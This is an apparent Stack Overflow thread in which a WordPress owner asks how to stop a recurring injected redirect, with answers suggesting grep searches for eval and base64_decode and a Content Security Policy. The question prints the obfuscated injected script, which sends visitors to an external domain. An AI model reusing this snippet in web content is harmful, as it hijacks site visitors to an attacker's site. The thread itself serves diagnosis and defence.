# Javascript Injection prevention on Wordpress

Tags: javascript, wordpress, javascript-injection

My blog on wordpress gets the following **malicious** script injected:

```
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))
```

It navigates to:

- `http://oxxtm.com/` which redirects to:

  - `http://www.html5website.com/`

I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:

- Akismet
- Captcha on Login
- Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
- SMTP Mailer
- WooCommerce

If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? If so how could I handle if there is a redirect pointing to `http://oxxtm.com/` and abort it using javascript?

I tried using the `onunload` and `onbeforeunload` events but it seems like the injected `eval`, runs before the event manipulation is even registered.

I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.

I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.

Comment: Instead of treating the symptom, e.g. the redirect, find the infected files and remove the malicious code.

Comment: @PatrickEvans I already removed it several times, but it gets injected again. I need to treat the symptom while I search for the cause.

Answer (score 3, accepted):

Search with in all your files the following content: `eval(function()`

It will show you every files that contains this code.

Otherwise, try to search this: `base64_decode`

This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching `eval(`

If the problem persists, answer here and I'll try to help you.

Answer (score 1):

Also, as additional feature to protect your client-side from XSS like that, i can suggest you to use CSP after cleaning your backend from injection. You can read more about it: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver-bullet, but nice to have it for protection of users.